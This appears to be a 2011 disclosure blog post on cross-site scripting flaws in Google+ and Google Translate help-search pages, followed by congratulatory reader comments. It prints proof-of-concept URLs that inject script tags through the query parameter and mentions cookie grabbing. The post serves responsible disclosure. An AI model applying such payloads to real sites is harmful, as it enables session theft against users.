Google+ Help Support & Google Translator Help Support [XSS]

July 21, 2011

——————————————————————
0x1 Affected Script: Google+ Help Support & Google+ Help Support & Google Translator Help Support
0x2 Script Link: http://translate.google.com/& http://plus.google.com/

0x4 Author: Sandeep kamble
0x5 Reported : June 30 2011
0x6 Public Release July 21 2011
——————————————————————

Affected Script Overview : Google+ Help Center where you can find tips and tutorials on using Google+ and other answers to frequently asked questions and Google Translate Help Center where you can find tips and tutorials on using Google Translate and other answers to frequently asked questions.

Affected script :
1) +/bin/search.py?query=
2) support/bin/search.py?query=  (Subdomain Translator)

Exploit : 

Executing Javascript using the vulnerable variable called as ?Query . This attack is commonly know as Cross Site Scripting (XSS)
Google + affected script having stored Xss attack which can used for the grabbing the cookies .
Google Translator Non-persistent XSS attack which can be used to execute only the JS Script

POC :
1) Google +

http://www.google.com/support/+/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27ss%27%29%3C/script%3E&btnG=Search
Don’t shock , you might be thinking the payload “alert(‘ss’)” and give output as “XSS” in message . This is happen due to spelling (Google function did u meant ) ..

Try to search this keyword “<script>alert(‘ss’)</script>” you will get the answer why it was coming.

2) Translator Google
http://translate.google.com/support/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27s%27%29%3C%2Fscript%3E&btnG=Search+Help&ctx=en%3Asearchbox
I don’t have screen shot of Google translator XSS attack.

 

Google XSS

 

Countermeasure

1) Determine whether HTML output includes input parameters
2) In short perform input sanitization

Thank you to Google

http://www.google.com/about/corporate/company/halloffame.html

If you want to test your application. Vulnerability Research and Penetration testing service. Follow me on Twitter @sandeepL337

 

We Provide Penetration Testing
4 Comments
HouSSam
July 23, 2011 @ 10:37 am

congratulation my friend for entering in the hall of fame, flourishing future is announced for genius like you :)

Reply
Amit
July 26, 2011 @ 5:30 pm

Well Done DuDe it’s great work…

Reply
Mohesh
August 5, 2011 @ 8:05 am

Good work dude. And congrats for making into google hall of fame cheers :)

Reply
Crash
August 19, 2011 @ 6:27 pm

Nice man!! Congratz!!

Reply

Leave a Reply to Mohesh Cancel reply

Your email address will not be published. Required fields are marked *

*




We Provide Penetration Testing